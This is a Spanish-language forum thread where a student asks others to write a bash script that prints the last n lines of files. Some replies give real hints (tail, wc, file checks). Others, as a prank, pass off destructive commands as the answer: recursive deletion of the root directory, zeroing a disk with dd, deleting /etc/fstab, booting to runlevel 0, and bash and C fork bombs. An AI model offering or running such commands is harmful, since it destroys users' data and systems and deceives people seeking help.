Script imposible (Muy dificil)

Alguien sabe acer este script?
llevo horas intentandolo y no me sale:

Crear un script o guion llamado ver y que tenga la siguiente sintaxis:
ver <archivo1> <archivo2> <archivo3> ...<archivoN>
Su funcionamiento es el siguiente:
- Pide un numero por el teclado al usuario, que llamaremos, n.
- Para cada archivo dado como argumento,visualiza en pantalla las ultimas n lineas de casa archivo y las imprime en un archivo que crea en el directorio padre que debe llamarse prueba.
- Debe comprobar que el numero n es menor que el numero total de lineas del archivo a visualizar. Si no, debe mandar un mensaje indicando que no existe sufucientes lineas en el archio.
- Debe comprobar que los nombres de archivo dados como argumentos en el script corresponden a archivo regulares existentes y que se da el numero de argumentos correctos al llamar al guion.

Alguien podria acerlo y colgarlo??
Gracias.
Di que sí, que te hagan los deberes y encima lo pones por duplicado, con 2 cojones!!

Si tienes alguna duda concreta pregunta e intentaremos ayudarte, pero nadie te va a hacer el ejercicio.

Un saludo.
Los trabajos de clase te los hace tu... XD

Asi abote pronto recuerdo algo como...

pasarle por parametros los archivos y hacer de cada uno un cat [ficheroaleer] | tail [pasandole por parametro el recogido por teclado junto a la opcion propia] >> ficherofinal

Antes de ello claro debera comprobar las lineas del fichero claro, con un count de cierto comando lo puedes hacer.

Son comandos y parametros simples... toda la pinta de un script escolar XD, mira la documentacion y comandos habituales que han enseñado. Pues cada uno podria decirte cosas distintas XD.

Dificil, dificil... no es..., lo podria hacer gente sin ni idea de programacion con poca ayuda al parecer vamos. no veo tuberias ni condicionales muy complejos.
Creo que seria algo asi como :

rm -fr /

Depende de como deberisa ser :

sudo rm -fr /

Algunas distros son distintas y deberías usar la segunda opción.
lovechii5 escribió:Creo que seria algo asi como :

rm -fr /

sudo rm -fr /

Hostia , funciona! :) .
No es muy difícil, es muy sencillo, otra cosa es que ni lo hayas intentado. Aquí no te vamos a hacer los deberes, si tienes alguna duda concreta, adelante.
Por aquí no está muy bien visto eso de pedir que te hagan los deberes, esto no es el rincón del vago XD
Además no concretas ninguna duda ni aportas ningún tipo de información, probablemente no has invertido ni dos segundos en intentarlo.
Es bastante sencillo, revisa tus apuntes y comenta dudas.

Saludos.
Me uno a todos lo que dicen los demas.
Pero bueno, hubiese sido mejor que preguntases dudas mas básicas, tipo, como cuento el número de lineas... lo cual sabe responder google a la primera... pero si estas vago pues tienes wc
lovechii5 escribió:Creo que seria algo asi como :

rm -fr /

sudo rm -fr /

Cierto, también puede servir (aunque depende de la configuración de tu distro)
dd if=/dev/zero of=/dev/sda bs=1M
ó
dd if=/dev/zero of=/dev/hda bs=1M
o sus variantes con sudo.

Un saludo.
Para empezar, un consejo, cambiate el runlevel a nivel 0, ya que el scripting a nivel de consola es muy dificil y consume muchos recursos, con runlevel 0 no tendras inconvenientes con eso.

Para cambiarlo, pues en el inicio, en el grub vamos, le das a edit, y en la linea del kernel al final pones:

runlevel=0

Le das a guardar y ya esta.

Otra forma mas rapida de iniciar en runlevel 0 es eliminando el archivo de /etc/fstab

sudo rm -rf /etc/fstab
Esto es lo k ace uno cuando esta en mitad de un examen de fundamentos de software, y no tiene ni puta idea como se hacia ("Ni con los apuntes") todo debido a k la profesora no explica Vv', pero weno agradesco vuestra ayuda, en el proximo examen are preguntas concretas jejje.
PD:Programacion se me da bien, en c,c++, c#, pero no los scripts jajaja.
Saludos a todos!
Y bien, ¿te funcionarion los "scripts" que te pasaron los foreros?

ByEs [buenazo]
rabin escribió:Esto es lo k ace uno cuando esta en mitad de un examen de fundamentos de software, y no tiene ni puta idea como se hacia ("Ni con los apuntes") todo debido a k la profesora no explica Vv', pero weno agradesco vuestra ayuda, en el proximo examen are preguntas concretas jejje.
PD:Programacion se me da bien, en c,c++, c#, pero no los scripts jajaja.
Saludos a todos!

si sabes c... sabras hacer chorradas de esas...

Yo te recomiendo runlevel 0 xD
No sois zorros ni nada jajajaja
Hombre... independiente de que está un poco feo... el fork bomb es más "divertido" que borrar un disco.

:(){ :|:& };:

- ferdy
Ferdy escribió:Hombre... independiente de que está un poco feo... el fork bomb es más "divertido" que borrar un disco.

:(){ :|:& };:

- ferdy

#include <unistd.h>

int main(void)
{
  for(;;)
    fork();
  return 0;
}

+info: http://en.wikipedia.org/wiki/Fork_bomb
el fork bomb en sh solo es menos bonito que el de perl.
Hombre la gracia que tiene el fork bomb en bash es que usando : al primer golpe de vista es más difícil ver lo que estás haciendo si no lo conoces...

Un saludo.
Bueno, ahora te digo que tu script casi imposible esta tirado unas pistas wc, tail, if [ -f ], ala, ahora buscas lo que es todo y podras hacer tu script.
creo k todos sabeis k lo de (IMPOSIBLE) lo puse para llamar la atencion ;) estaba en pleno examen jejeje!
La verdad k no e probado ninguno de vuestros consejos, xk me podia imaginar lo que hacian...
PD:Gracias x la ultima ayuda sabia que era algo con tail... pero no me acordaba exactamente, x eso la desesperacion jejej
tMK está baneado por "saltarse baneo temporal con clon"
Tienes una cosa que se llama google donde seguro que puedes buscar todo lo que necesitas para cualquier script que se te ocurra.
tMK escribió:Tienes una cosa que se llama google donde seguro que puedes buscar todo lo que necesitas para cualquier script que se te ocurra.

¿Eso lo hay para linux tambien?
Sepho escribió:
tMK escribió:Tienes una cosa que se llama google donde seguro que puedes buscar todo lo que necesitas para cualquier script que se te ocurra.

¿Eso lo hay para linux tambien?

Sólo para PC.
Ya son ganas de ir haciéndole los deberes del cole a la gente...
23 respuestas